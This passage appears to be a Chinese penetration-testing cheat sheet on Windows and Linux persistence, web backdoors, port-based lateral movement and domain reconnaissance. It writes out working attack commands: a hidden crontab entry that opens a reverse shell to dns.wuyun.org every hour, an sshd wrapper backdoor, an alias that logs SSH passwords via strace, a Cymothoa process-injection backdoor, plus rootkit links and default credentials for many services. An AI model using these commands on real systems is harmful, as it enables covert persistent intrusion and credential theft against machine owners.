<h4 id="24&#x3001;hijack-caccpropservicesclass-and-mmdeviceenumerato"><a name="24&#x3001;hijack-caccpropservicesclass-and-mmdeviceenumerato" class="anchor-navigation-ex-anchor" href="#24&#x3001;hijack-caccpropservicesclass-and-mmdeviceenumerato"><i class="fa fa-link" aria-hidden="true"></i></a>24&#x3001;<a href="https://3gstudent.github.io/3gstudent.github.io/Use-COM-Object-hijacking-to-maintain-persistence-Hijack-CAccPropServicesClass-and-MMDeviceEnumerator/" target="_blank">Hijack CAccPropServicesClass and MMDeviceEnumerato</a></h4>
<p>&#x5229;&#x7528;COM&#x7EC4;&#x4EF6;&#xFF0C;&#x4E0D;&#x9700;&#x8981;&#x91CD;&#x542F;&#x7CFB;&#x7EDF;&#xFF0C;&#x4E0D;&#x9700;&#x8981;&#x7BA1;&#x7406;&#x5458;&#x6743;&#x9650;
&#x901A;&#x8FC7;&#x4FEE;&#x6539;&#x6CE8;&#x518C;&#x8868;&#x5B9E;&#x73B0;
POC&#xFF1A;<a href="https://github.com/3gstudent/COM-Object-hijacking" target="_blank">https://github.com/3gstudent/COM-Object-hijacking</a> </p>
<h4 id="25&#x3001;hijack-explorerexe"><a name="25&#x3001;hijack-explorerexe" class="anchor-navigation-ex-anchor" href="#25&#x3001;hijack-explorerexe"><i class="fa fa-link" aria-hidden="true"></i></a>25&#x3001;<a href="https://3gstudent.github.io/3gstudent.github.io/Use-COM-Object-hijacking-to-maintain-persistence-Hijack-explorer.exe/" target="_blank">Hijack explorer.exe</a></h4>
<p>COM&#x7EC4;&#x4EF6;&#x52AB;&#x6301;&#xFF0C;&#x4E0D;&#x9700;&#x8981;&#x91CD;&#x542F;&#x7CFB;&#x7EDF;&#xFF0C;&#x4E0D;&#x9700;&#x8981;&#x7BA1;&#x7406;&#x5458;&#x6743;&#x9650;
&#x901A;&#x8FC7;&#x4FEE;&#x6539;&#x6CE8;&#x518C;&#x8868;&#x5B9E;&#x73B0;</p>
<pre class="language-"><code>HKCU\Software\Classes\CLSID{42aedc87-2188-41fd-b9a3-0c966feabec1}
HKCU\Software\Classes\CLSID{fbeb8a05-beee-4442-804e-409d6c4515e9}
HKCU\Software\Classes\CLSID{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}
HKCU\Software\Classes\Wow6432Node\CLSID{BCDE0395-E52F-467C-8E3D-C4579291692E}
</code></pre><h4 id="26&#x3001;windows-fax-dll-injection"><a name="26&#x3001;windows-fax-dll-injection" class="anchor-navigation-ex-anchor" href="#26&#x3001;windows-fax-dll-injection"><i class="fa fa-link" aria-hidden="true"></i></a>26&#x3001;Windows FAX DLL Injection</h4>
<p>&#x901A;&#x8FC7;DLL&#x52AB;&#x6301;&#xFF0C;&#x52AB;&#x6301;Explorer.exe&#x5BF9;<code>fxsst.dll</code>&#x7684;&#x52A0;&#x8F7D;
Explorer.exe&#x5728;&#x542F;&#x52A8;&#x65F6;&#x4F1A;&#x52A0;&#x8F7D;<code>c:\Windows\System32\fxsst.dll</code>(&#x670D;&#x52A1;&#x9ED8;&#x8BA4;&#x5F00;&#x542F;&#xFF0C;&#x7528;&#x4E8E;&#x4F20;&#x771F;&#x670D;&#x52A1;)&#x5C06;payload.dll&#x4FDD;&#x5B58;&#x5728;<code>c:\Windows\fxsst.dll</code>&#xFF0C;&#x80FD;&#x591F;&#x5B9E;&#x73B0;dll&#x52AB;&#x6301;&#xFF0C;&#x52AB;&#x6301;Explorer.exe&#x5BF9;<code>fxsst.dll</code>&#x7684;&#x52A0;&#x8F7D;</p>
<h4 id="27&#x3001;&#x7279;&#x6B8A;&#x6CE8;&#x518C;&#x8868;&#x952E;&#x503C;"><a name="27&#x3001;&#x7279;&#x6B8A;&#x6CE8;&#x518C;&#x8868;&#x952E;&#x503C;" class="anchor-navigation-ex-anchor" href="#27&#x3001;&#x7279;&#x6B8A;&#x6CE8;&#x518C;&#x8868;&#x952E;&#x503C;"><i class="fa fa-link" aria-hidden="true"></i></a>27&#x3001;&#x7279;&#x6B8A;&#x6CE8;&#x518C;&#x8868;&#x952E;&#x503C;</h4>
<p>&#x5728;&#x6CE8;&#x518C;&#x8868;&#x542F;&#x52A8;&#x9879;&#x521B;&#x5EFA;&#x7279;&#x6B8A;&#x540D;&#x79F0;&#x7684;&#x6CE8;&#x518C;&#x8868;&#x952E;&#x503C;&#xFF0C;&#x7528;&#x6237;&#x6B63;&#x5E38;&#x60C5;&#x51B5;&#x4E0B;&#x65E0;&#x6CD5;&#x8BFB;&#x53D6;(&#x4F7F;&#x7528;Win32 API)&#xFF0C;&#x4F46;&#x7CFB;&#x7EDF;&#x80FD;&#x591F;&#x6267;&#x884C;(&#x4F7F;&#x7528;Native API)&#x3002;
<a href="https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E9%9A%90%E8%97%8F-%E6%B3%A8%E5%86%8C%E8%A1%A8%E7%9A%84%E5%88%9B%E5%BB%BA/" target="_blank">&#x300A;&#x6E17;&#x900F;&#x6280;&#x5DE7;&#x2014;&#x2014;&quot;&#x9690;&#x85CF;&quot;&#x6CE8;&#x518C;&#x8868;&#x7684;&#x521B;&#x5EFA;&#x300B;</a>
<a href="https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E9%9A%90%E8%97%8F-%E6%B3%A8%E5%86%8C%E8%A1%A8%E7%9A%84%E6%9B%B4%E5%A4%9A%E6%B5%8B%E8%AF%95/" target="_blank">&#x300A;&#x6E17;&#x900F;&#x6280;&#x5DE7;&#x2014;&#x2014;&quot;&#x9690;&#x85CF;&quot;&#x6CE8;&#x518C;&#x8868;&#x7684;&#x66F4;&#x591A;&#x6D4B;&#x8BD5;&#x300B;</a></p>
<h4 id="28&#x3001;&#x5FEB;&#x6377;&#x65B9;&#x5F0F;&#x540E;&#x95E8;"><a name="28&#x3001;&#x5FEB;&#x6377;&#x65B9;&#x5F0F;&#x540E;&#x95E8;" class="anchor-navigation-ex-anchor" href="#28&#x3001;&#x5FEB;&#x6377;&#x65B9;&#x5F0F;&#x540E;&#x95E8;"><i class="fa fa-link" aria-hidden="true"></i></a>28&#x3001;&#x5FEB;&#x6377;&#x65B9;&#x5F0F;&#x540E;&#x95E8;</h4>
<p>&#x66FF;&#x6362;&#x6211;&#x7684;&#x7535;&#x8111;&#x5FEB;&#x6377;&#x65B9;&#x5F0F;&#x542F;&#x52A8;&#x53C2;&#x6570;
POC : <a href="https://github.com/Ridter/Pentest/blob/master/powershell/MyShell/Backdoor/LNK_backdoor.ps1" target="_blank">https://github.com/Ridter/Pentest/blob/master/powershell/MyShell/Backdoor/LNK_backdoor.ps1</a></p>
<h4 id="29&#x3001;logon-scripts"><a name="29&#x3001;logon-scripts" class="anchor-navigation-ex-anchor" href="#29&#x3001;logon-scripts"><i class="fa fa-link" aria-hidden="true"></i></a>29&#x3001;<a href="https://3gstudent.github.io/3gstudent.github.io/Use-Logon-Scripts-to-maintain-persistence/" target="_blank">Logon Scripts</a></h4>
<pre class="language-"><code>New-ItemProperty &quot;HKCU:\Environment\&quot; UserInitMprLogonScript -value &quot;c:\test\11.bat&quot; -propertyType string | Out-Null
</code></pre><h4 id="30&#x3001;password-filter-dll"><a name="30&#x3001;password-filter-dll" class="anchor-navigation-ex-anchor" href="#30&#x3001;password-filter-dll"><i class="fa fa-link" aria-hidden="true"></i></a>30&#x3001;<a href="https://3gstudent.github.io/3gstudent.github.io/Password-Filter-DLL%E5%9C%A8%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E4%B8%AD%E7%9A%84%E5%BA%94%E7%94%A8/" target="_blank">Password Filter DLL</a></h4>
<h4 id="31&#x3001;&#x5229;&#x7528;bho&#x5B9E;&#x73B0;ie&#x6D4F;&#x89C8;&#x5668;&#x52AB;&#x6301;"><a name="31&#x3001;&#x5229;&#x7528;bho&#x5B9E;&#x73B0;ie&#x6D4F;&#x89C8;&#x5668;&#x52AB;&#x6301;" class="anchor-navigation-ex-anchor" href="#31&#x3001;&#x5229;&#x7528;bho&#x5B9E;&#x73B0;ie&#x6D4F;&#x89C8;&#x5668;&#x52AB;&#x6301;"><i class="fa fa-link" aria-hidden="true"></i></a>31&#x3001;<a href="https://3gstudent.github.io/3gstudent.github.io/%E5%88%A9%E7%94%A8BHO%E5%AE%9E%E7%8E%B0IE%E6%B5%8F%E8%A7%88%E5%99%A8%E5%8A%AB%E6%8C%81/" target="_blank">&#x5229;&#x7528;BHO&#x5B9E;&#x73B0;IE&#x6D4F;&#x89C8;&#x5668;&#x52AB;&#x6301;</a></h4>
<h3 id="linux_2"><a name="linux_2" class="anchor-navigation-ex-anchor" href="#linux_2"><i class="fa fa-link" aria-hidden="true"></i></a>Linux</h3>
<h4 id="crontab"><a name="crontab" class="anchor-navigation-ex-anchor" href="#crontab"><i class="fa fa-link" aria-hidden="true"></i></a>crontab</h4>
<p>&#x6BCF;60&#x5206;&#x949F;&#x53CD;&#x5F39;&#x4E00;&#x6B21;shell&#x7ED9;dns.wuyun.org&#x7684;53&#x7AEF;&#x53E3;</p>
<pre class="language-"><code>#!bash
(crontab -l;printf &quot;*/60 * * * * exec 9&lt;&gt; /dev/tcp/dns.wuyun.org/53;exec 0<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>&amp;9;exec</span> <span class="token attr-name">1</span><span class="token punctuation">&gt;</span></span>&amp;9 2&gt;<span class="token entity" title="&amp;1;">&amp;1;</span>/bin/bash --noprofile -i;\rno crontab for `whoami`%100c\n&quot;)|crontab -
</code></pre><h4 id="&#x786C;&#x94FE;&#x63A5;sshd"><a name="&#x786C;&#x94FE;&#x63A5;sshd" class="anchor-navigation-ex-anchor" href="#&#x786C;&#x94FE;&#x63A5;sshd"><i class="fa fa-link" aria-hidden="true"></i></a>&#x786C;&#x94FE;&#x63A5;sshd</h4>
<pre class="language-"><code>#!bash
ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=2333;
</code></pre><p>&#x94FE;&#x63A5;&#xFF1A;ssh root@192.168.206.142 -p 2333</p>
<h4 id="ssh-server-wrapper"><a name="ssh-server-wrapper" class="anchor-navigation-ex-anchor" href="#ssh-server-wrapper"><i class="fa fa-link" aria-hidden="true"></i></a>SSH Server wrapper</h4>
<pre class="language-"><code>#!bash
cd /usr/sbin
mv sshd ../bin
echo &apos;#!/usr/bin/perl&apos; &gt;sshd
echo &apos;exec &quot;/bin/sh&quot; if (getpeername(STDIN) =~ /^..4A/);&apos; &gt;&gt;sshd
echo &apos;exec {&quot;/usr/bin/sshd&quot;} &quot;/usr/sbin/sshd&quot;,@ARGV,&apos; &gt;&gt;sshd
chmod u+x sshd
//&#x4E0D;&#x7528;&#x91CD;&#x542F;&#x4E5F;&#x884C;
/etc/init.d/sshd restart
</code></pre><pre class="language-"><code>socat STDIO TCP4:192.168.206.142:22,sourceport=13377
</code></pre><h4 id="ssh-keylogger"><a name="ssh-keylogger" class="anchor-navigation-ex-anchor" href="#ssh-keylogger"><i class="fa fa-link" aria-hidden="true"></i></a>SSH keylogger</h4>
<p>vim&#x5F53;&#x524D;&#x7528;&#x6237;&#x4E0B;&#x7684;.bashrc&#x6587;&#x4EF6;,&#x672B;&#x5C3E;&#x6DFB;&#x52A0;</p>
<pre class="language-"><code>#!bash
alias ssh=&apos;strace -o /tmp/sshpwd-`date &apos;+%d%h%m%s&apos;`.log -e read,write,connect -s2048 ssh&apos;
</code></pre><p>source .bashrc</p>
<h4 id="cymothoa&#x8FDB;&#x7A0B;&#x6CE8;&#x5165;backdoor"><a name="cymothoa&#x8FDB;&#x7A0B;&#x6CE8;&#x5165;backdoor" class="anchor-navigation-ex-anchor" href="#cymothoa&#x8FDB;&#x7A0B;&#x6CE8;&#x5165;backdoor"><i class="fa fa-link" aria-hidden="true"></i></a>Cymothoa_&#x8FDB;&#x7A0B;&#x6CE8;&#x5165;backdoor</h4>
<pre class="language-"><code>./cymothoa -p 2270 -s 1 -y 7777
</code></pre><pre class="language-"><code>nc -vv ip 7777
</code></pre><h4 id="rootkit"><a name="rootkit" class="anchor-navigation-ex-anchor" href="#rootkit"><i class="fa fa-link" aria-hidden="true"></i></a>rootkit</h4>
<p><a href="http://core.ipsecs.com/rootkit/patch-to-hack/0x06-openssh-5.9p1.patch.tar.gz" target="_blank">openssh_rootkit</a>
<a href="http://core.ipsecs.com/rootkit/kernel-rootkit/ipsecs-kbeast-v1.tar.gz" target="_blank">Kbeast_rootkit </a>
Mafix + Suterusu rootkit</p>
<h4 id="tools"><a name="tools" class="anchor-navigation-ex-anchor" href="#tools"><i class="fa fa-link" aria-hidden="true"></i></a>Tools</h4>
<p><a href="https://github.com/Screetsec/Vegile" target="_blank">Vegile </a>
<a href="https://github.com/icco/backdoor" target="_blank">backdoor </a></p>
<h2 id="web&#x540E;&#x95E8;"><a name="web&#x540E;&#x95E8;" class="anchor-navigation-ex-anchor" href="#web&#x540E;&#x95E8;"><i class="fa fa-link" aria-hidden="true"></i></a>WEB&#x540E;&#x95E8;</h2>
<p>PHP Meterpreter&#x540E;&#x95E8; 
Aspx Meterpreter&#x540E;&#x95E8; 
weevely 
webacoo<br>....</p>
<h1 id="&#x6A2A;&#x5411;&#x6E17;&#x900F;"><a name="&#x6A2A;&#x5411;&#x6E17;&#x900F;" class="anchor-navigation-ex-anchor" href="#&#x6A2A;&#x5411;&#x6E17;&#x900F;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x6A2A;&#x5411;&#x6E17;&#x900F;</h1>
<h2 id="&#x7AEF;&#x53E3;&#x6E17;&#x900F;"><a name="&#x7AEF;&#x53E3;&#x6E17;&#x900F;" class="anchor-navigation-ex-anchor" href="#&#x7AEF;&#x53E3;&#x6E17;&#x900F;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x7AEF;&#x53E3;&#x6E17;&#x900F;</h2>
<h3 id="&#x7AEF;&#x53E3;&#x626B;&#x63CF;_1"><a name="&#x7AEF;&#x53E3;&#x626B;&#x63CF;_1" class="anchor-navigation-ex-anchor" href="#&#x7AEF;&#x53E3;&#x626B;&#x63CF;_1"><i class="fa fa-link" aria-hidden="true"></i></a>&#x7AEF;&#x53E3;&#x626B;&#x63CF;</h3>
<ul>
<li>1.&#x7AEF;&#x53E3;&#x7684;&#x6307;&#x7EB9;&#x4FE1;&#x606F;&#xFF08;&#x7248;&#x672C;&#x4FE1;&#x606F;&#xFF09; </li>
<li>2.&#x7AEF;&#x53E3;&#x6240;&#x5BF9;&#x5E94;&#x8FD0;&#x884C;&#x7684;&#x670D;&#x52A1;  </li>
<li>3.&#x5E38;&#x89C1;&#x7684;&#x9ED8;&#x8BA4;&#x7AEF;&#x53E3;&#x53F7;  </li>
<li>4.&#x5C1D;&#x8BD5;&#x5F31;&#x53E3;&#x4EE4; </li>
</ul>
<h3 id="&#x7AEF;&#x53E3;&#x7206;&#x7834;"><a name="&#x7AEF;&#x53E3;&#x7206;&#x7834;" class="anchor-navigation-ex-anchor" href="#&#x7AEF;&#x53E3;&#x7206;&#x7834;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x7AEF;&#x53E3;&#x7206;&#x7834;</h3>
<p><a href="https://github.com/vanhauser-thc/thc-hydra" target="_blank">hydra </a></p>
<h3 id="&#x7AEF;&#x53E3;&#x5F31;&#x53E3;&#x4EE4;"><a name="&#x7AEF;&#x53E3;&#x5F31;&#x53E3;&#x4EE4;" class="anchor-navigation-ex-anchor" href="#&#x7AEF;&#x53E3;&#x5F31;&#x53E3;&#x4EE4;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x7AEF;&#x53E3;&#x5F31;&#x53E3;&#x4EE4;</h3>
<ul>
<li>NTScan  </li>
<li>Hscan  </li>
<li>&#x81EA;&#x5199;&#x811A;&#x672C; </li>
</ul>
<h3 id="&#x7AEF;&#x53E3;&#x6EA2;&#x51FA;"><a name="&#x7AEF;&#x53E3;&#x6EA2;&#x51FA;" class="anchor-navigation-ex-anchor" href="#&#x7AEF;&#x53E3;&#x6EA2;&#x51FA;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x7AEF;&#x53E3;&#x6EA2;&#x51FA;</h3>
<p><strong>smb</strong></p>
<ul>
<li>ms08067 </li>
<li>ms17010 </li>
<li>ms11058 </li>
<li>... </li>
</ul>
<p><strong>apache</strong>
<strong>ftp</strong> 
<strong>...</strong></p>
<h3 id="&#x5E38;&#x89C1;&#x7684;&#x9ED8;&#x8BA4;&#x7AEF;&#x53E3;"><a name="&#x5E38;&#x89C1;&#x7684;&#x9ED8;&#x8BA4;&#x7AEF;&#x53E3;" class="anchor-navigation-ex-anchor" href="#&#x5E38;&#x89C1;&#x7684;&#x9ED8;&#x8BA4;&#x7AEF;&#x53E3;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x5E38;&#x89C1;&#x7684;&#x9ED8;&#x8BA4;&#x7AEF;&#x53E3;</h3>
<h4 id="1&#x3001;web&#x7C7B;web&#x6F0F;&#x6D1E;&#x654F;&#x611F;&#x76EE;&#x5F55;"><a name="1&#x3001;web&#x7C7B;web&#x6F0F;&#x6D1E;&#x654F;&#x611F;&#x76EE;&#x5F55;" class="anchor-navigation-ex-anchor" href="#1&#x3001;web&#x7C7B;web&#x6F0F;&#x6D1E;&#x654F;&#x611F;&#x76EE;&#x5F55;"><i class="fa fa-link" aria-hidden="true"></i></a>1&#x3001;web&#x7C7B;(web&#x6F0F;&#x6D1E;/&#x654F;&#x611F;&#x76EE;&#x5F55;)</h4>
<p>&#x7B2C;&#x4E09;&#x65B9;&#x901A;&#x7528;&#x7EC4;&#x4EF6;&#x6F0F;&#x6D1E;: struts thinkphp jboss ganglia zabbix ...</p>
<pre class="language-"><code>80 web 
80-89 web 
8000-9090 web
</code></pre><h4 id="2&#x3001;&#x6570;&#x636E;&#x5E93;&#x7C7B;&#x626B;&#x63CF;&#x5F31;&#x53E3;&#x4EE4;"><a name="2&#x3001;&#x6570;&#x636E;&#x5E93;&#x7C7B;&#x626B;&#x63CF;&#x5F31;&#x53E3;&#x4EE4;" class="anchor-navigation-ex-anchor" href="#2&#x3001;&#x6570;&#x636E;&#x5E93;&#x7C7B;&#x626B;&#x63CF;&#x5F31;&#x53E3;&#x4EE4;"><i class="fa fa-link" aria-hidden="true"></i></a>2&#x3001;&#x6570;&#x636E;&#x5E93;&#x7C7B;(&#x626B;&#x63CF;&#x5F31;&#x53E3;&#x4EE4;)</h4>
<pre class="language-"><code>1433 MSSQL 
1521 Oracle 
3306 MySQL 
5432 PostgreSQL 
50000 DB2
</code></pre><h4 id="3&#x3001;&#x7279;&#x6B8A;&#x670D;&#x52A1;&#x7C7B;&#x672A;&#x6388;&#x6743;&#x547D;&#x4EE4;&#x6267;&#x884C;&#x7C7B;&#x6F0F;&#x6D1E;"><a name="3&#x3001;&#x7279;&#x6B8A;&#x670D;&#x52A1;&#x7C7B;&#x672A;&#x6388;&#x6743;&#x547D;&#x4EE4;&#x6267;&#x884C;&#x7C7B;&#x6F0F;&#x6D1E;" class="anchor-navigation-ex-anchor" href="#3&#x3001;&#x7279;&#x6B8A;&#x670D;&#x52A1;&#x7C7B;&#x672A;&#x6388;&#x6743;&#x547D;&#x4EE4;&#x6267;&#x884C;&#x7C7B;&#x6F0F;&#x6D1E;"><i class="fa fa-link" aria-hidden="true"></i></a>3&#x3001;&#x7279;&#x6B8A;&#x670D;&#x52A1;&#x7C7B;(&#x672A;&#x6388;&#x6743;/&#x547D;&#x4EE4;&#x6267;&#x884C;&#x7C7B;/&#x6F0F;&#x6D1E;)</h4>
<pre class="language-"><code>443 SSL&#x5FC3;&#x810F;&#x6EF4;&#x8840; 
445 ms08067/ms11058/ms17010&#x7B49; 
873 Rsync&#x672A;&#x6388;&#x6743; 
5984 CouchDB http://xxx:5984/_utils/ 
6379 redis&#x672A;&#x6388;&#x6743; 
7001,7002 WebLogic&#x9ED8;&#x8BA4;&#x5F31;&#x53E3;&#x4EE4;&#xFF0C;&#x53CD;&#x5E8F;&#x5217; 
9200,9300 elasticsearch &#x53C2;&#x8003;WooYun: &#x591A;&#x73A9;&#x67D0;&#x670D;&#x52A1;&#x5668;ElasticSearch&#x547D;&#x4EE4;&#x6267;&#x884C;&#x6F0F;&#x6D1E; 
11211 memcache&#x672A;&#x6388;&#x6743;&#x8BBF;&#x95EE; 
27017,27018 Mongodb&#x672A;&#x6388;&#x6743;&#x8BBF;&#x95EE; 
50000 SAP&#x547D;&#x4EE4;&#x6267;&#x884C; 
50070,50030 hadoop&#x9ED8;&#x8BA4;&#x7AEF;&#x53E3;&#x672A;&#x6388;&#x6743;&#x8BBF;&#x95EE;
</code></pre><h4 id="4&#x3001;&#x5E38;&#x7528;&#x7AEF;&#x53E3;&#x7C7B;&#x626B;&#x63CF;&#x5F31;&#x53E3;&#x4EE4;&#x7AEF;&#x53E3;&#x7206;&#x7834;"><a name="4&#x3001;&#x5E38;&#x7528;&#x7AEF;&#x53E3;&#x7C7B;&#x626B;&#x63CF;&#x5F31;&#x53E3;&#x4EE4;&#x7AEF;&#x53E3;&#x7206;&#x7834;" class="anchor-navigation-ex-anchor" href="#4&#x3001;&#x5E38;&#x7528;&#x7AEF;&#x53E3;&#x7C7B;&#x626B;&#x63CF;&#x5F31;&#x53E3;&#x4EE4;&#x7AEF;&#x53E3;&#x7206;&#x7834;"><i class="fa fa-link" aria-hidden="true"></i></a>4&#x3001;&#x5E38;&#x7528;&#x7AEF;&#x53E3;&#x7C7B;(&#x626B;&#x63CF;&#x5F31;&#x53E3;&#x4EE4;/&#x7AEF;&#x53E3;&#x7206;&#x7834;)</h4>
<pre class="language-"><code>21 ftp 
22 SSH 
23 Telnet 
445 SMB&#x5F31;&#x53E3;&#x4EE4;&#x626B;&#x63CF; 
2601,2604 zebra&#x8DEF;&#x7531;&#xFF0C;&#x9ED8;&#x8BA4;&#x5BC6;&#x7801;zebra 
3389 &#x8FDC;&#x7A0B;&#x684C;&#x9762;
</code></pre><h4 id="5&#x3001;&#x7AEF;&#x53E3;&#x5408;&#x8BA1;&#x6240;&#x5BF9;&#x5E94;&#x7684;&#x670D;&#x52A1;"><a name="5&#x3001;&#x7AEF;&#x53E3;&#x5408;&#x8BA1;&#x6240;&#x5BF9;&#x5E94;&#x7684;&#x670D;&#x52A1;" class="anchor-navigation-ex-anchor" href="#5&#x3001;&#x7AEF;&#x53E3;&#x5408;&#x8BA1;&#x6240;&#x5BF9;&#x5E94;&#x7684;&#x670D;&#x52A1;"><i class="fa fa-link" aria-hidden="true"></i></a>5&#x3001;&#x7AEF;&#x53E3;&#x5408;&#x8BA1;&#x6240;&#x5BF9;&#x5E94;&#x7684;&#x670D;&#x52A1;</h4>
<pre class="language-"><code>21 ftp 
22 SSH 
23 Telnet 
25 SMTP 
53 DNS 
69 TFTP 
80 web 
80-89 web 
110 POP3 
135 RPC 
139 NETBIOS 
143 IMAP 
161 SNMP 
389 LDAP 
443 SSL&#x5FC3;&#x810F;&#x6EF4;&#x8840;&#x4EE5;&#x53CA;&#x4E00;&#x4E9B;web&#x6F0F;&#x6D1E;&#x6D4B;&#x8BD5; 
445 SMB 
512,513,514 Rexec 
873 Rsync&#x672A;&#x6388;&#x6743; 
1025,111 NFS 
1080 socks 
1158 ORACLE EMCTL2601,2604 zebra&#x8DEF;&#x7531;&#xFF0C;&#x9ED8;&#x8BA4;&#x5BC6;&#x7801;zebra&#x6848; 
1433 MSSQL (&#x66B4;&#x529B;&#x7834;&#x89E3;) 
1521 Oracle:(iSqlPlus Port:5560,7778) 
2082/2083 cpanel&#x4E3B;&#x673A;&#x7BA1;&#x7406;&#x7CFB;&#x7EDF;&#x767B;&#x9646; &#xFF08;&#x56FD;&#x5916;&#x7528;&#x8F83;&#x591A;&#xFF09; 
2222 DA&#x865A;&#x62DF;&#x4E3B;&#x673A;&#x7BA1;&#x7406;&#x7CFB;&#x7EDF;&#x767B;&#x9646; &#xFF08;&#x56FD;&#x5916;&#x7528;&#x8F83;&#x591A;&#xFF09; 
2601,2604 zebra&#x8DEF;&#x7531;&#xFF0C;&#x9ED8;&#x8BA4;&#x5BC6;&#x7801;zebra 
3128 squid&#x4EE3;&#x7406;&#x9ED8;&#x8BA4;&#x7AEF;&#x53E3;&#xFF0C;&#x5982;&#x679C;&#x6CA1;&#x8BBE;&#x7F6E;&#x53E3;&#x4EE4;&#x5F88;&#x53EF;&#x80FD;&#x5C31;&#x76F4;&#x63A5;&#x6F2B;&#x6E38;&#x5185;&#x7F51;&#x4E86; 
3306 MySQL &#xFF08;&#x66B4;&#x529B;&#x7834;&#x89E3;&#xFF09; 
3312/3311 kangle&#x4E3B;&#x673A;&#x7BA1;&#x7406;&#x7CFB;&#x7EDF;&#x767B;&#x9646; 
3389 &#x8FDC;&#x7A0B;&#x684C;&#x9762; 
3690 svn 
4440 rundeck &#x53C2;&#x8003;WooYun: &#x501F;&#x7528;&#x65B0;&#x6D6A;&#x67D0;&#x670D;&#x52A1;&#x6210;&#x529F;&#x6F2B;&#x6E38;&#x65B0;&#x6D6A;&#x5185;&#x7F51; 
4848 GlassFish web&#x4E2D;&#x95F4;&#x4EF6; &#x5F31;&#x53E3;&#x4EE4;:admin/adminadmin 
5432 PostgreSQL 
5900 vnc 
5984 CouchDB http://xxx:5984/_utils/ 
6082 varnish &#x53C2;&#x8003;WooYun: Varnish HTTP accelerator CLI &#x672A;&#x6388;&#x6743;&#x8BBF;&#x95EE;&#x6613;&#x5BFC;&#x81F4;&#x7F51;&#x7AD9;&#x88AB;&#x76F4;&#x63A5;&#x7BE1;&#x6539;&#x6216;&#x8005;&#x4F5C;&#x4E3A;&#x4EE3;&#x7406;&#x8FDB;&#x5165;&#x5185;&#x7F51; 
6379 redis&#x672A;&#x6388;&#x6743; 
7001,7002 WebLogic&#x9ED8;&#x8BA4;&#x5F31;&#x53E3;&#x4EE4;&#xFF0C;&#x53CD;&#x5E8F;&#x5217; 
7778 Kloxo&#x4E3B;&#x673A;&#x63A7;&#x5236;&#x9762;&#x677F;&#x767B;&#x5F55; 
8000-9090 &#x90FD;&#x662F;&#x4E00;&#x4E9B;&#x5E38;&#x89C1;&#x7684;web&#x7AEF;&#x53E3;&#xFF0C;&#x6709;&#x4E9B;&#x8FD0;&#x7EF4;&#x559C;&#x6B22;&#x628A;&#x7BA1;&#x7406;&#x540E;&#x53F0;&#x5F00;&#x5728;&#x8FD9;&#x4E9B;&#x975E;80&#x7684;&#x7AEF;&#x53E3;&#x4E0A; 
8080 tomcat/WDCd/ &#x4E3B;&#x673A;&#x7BA1;&#x7406;&#x7CFB;&#x7EDF;&#xFF0C;&#x9ED8;&#x8BA4;&#x5F31;&#x53E3;&#x4EE4; 
8080,8089,9090 JBOSS 
8081 Symantec AV/Filter for MSE 
8083 Vestacp&#x4E3B;&#x673A;&#x7BA1;&#x7406;&#x7CFB;&#x7EDF; &#xFF08;&#x56FD;&#x5916;&#x7528;&#x8F83;&#x591A;&#xFF09; 
8649 ganglia 
8888 amh/LuManager &#x4E3B;&#x673A;&#x7BA1;&#x7406;&#x7CFB;&#x7EDF;&#x9ED8;&#x8BA4;&#x7AEF;&#x53E3; 
9000 fcgi fcig php&#x6267;&#x884C; 
9043 websphere[web&#x4E2D;&#x95F4;&#x4EF6;] &#x5F31;&#x53E3;&#x4EE4;: admin/admin websphere/ websphere ststem/manager 
9200,9300 elasticsearch &#x53C2;&#x8003;WooYun: &#x591A;&#x73A9;&#x67D0;&#x670D;&#x52A1;&#x5668;ElasticSearch&#x547D;&#x4EE4;&#x6267;&#x884C;&#x6F0F;&#x6D1E; 
10000 Virtualmin/Webmin &#x670D;&#x52A1;&#x5668;&#x865A;&#x62DF;&#x4E3B;&#x673A;&#x7BA1;&#x7406;&#x7CFB;&#x7EDF; 
11211 memcache&#x672A;&#x6388;&#x6743;&#x8BBF;&#x95EE; 
27017,27018 Mongodb&#x672A;&#x6388;&#x6743;&#x8BBF;&#x95EE; 
28017 mongodb&#x7EDF;&#x8BA1;&#x9875;&#x9762; 
50000 SAP&#x547D;&#x4EE4;&#x6267;&#x884C; 
50060 hadoop 
50070,50030 hadoop&#x9ED8;&#x8BA4;&#x7AEF;&#x53E3;&#x672A;&#x6388;&#x6743;&#x8BBF;&#x95EE;
</code></pre><h2 id="&#x57DF;&#x6E17;&#x900F;"><a name="&#x57DF;&#x6E17;&#x900F;" class="anchor-navigation-ex-anchor" href="#&#x57DF;&#x6E17;&#x900F;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x57DF;&#x6E17;&#x900F;</h2>
<h3 id="&#x4FE1;&#x606F;&#x641C;&#x96C6;_1"><a name="&#x4FE1;&#x606F;&#x641C;&#x96C6;_1" class="anchor-navigation-ex-anchor" href="#&#x4FE1;&#x606F;&#x641C;&#x96C6;_1"><i class="fa fa-link" aria-hidden="true"></i></a>&#x4FE1;&#x606F;&#x641C;&#x96C6;</h3>
<p>powerview.ps1 </p>
<pre class="language-"><code>Get-NetDomain - gets the name of the current user&apos;s domain
Get-NetForest - gets the forest associated with the current user&apos;s domain
Get-NetForestDomains - gets all domains for the current forest
Get-NetDomainControllers - gets the domain controllers for the current computer&apos;s domain
Get-NetCurrentUser - gets the current [domain\]username
Get-NetUser - returns all user objects, or the user specified (wildcard specifiable)
Get-NetUserSPNs - gets all user ServicePrincipalNames
Get-NetOUs - gets data for domain organization units
Get-NetGUIDOUs - finds domain OUs linked to a specific GUID
Invoke-NetUserAdd - adds a local or domain user
Get-NetGroups - gets a list of all current groups in the domain
Get-NetGroup - gets data for each user in a specified domain group
Get-NetLocalGroups - gets a list of localgroups on a remote host or hosts
Get-NetLocalGroup - gets the members of a localgroup on a remote host or hosts
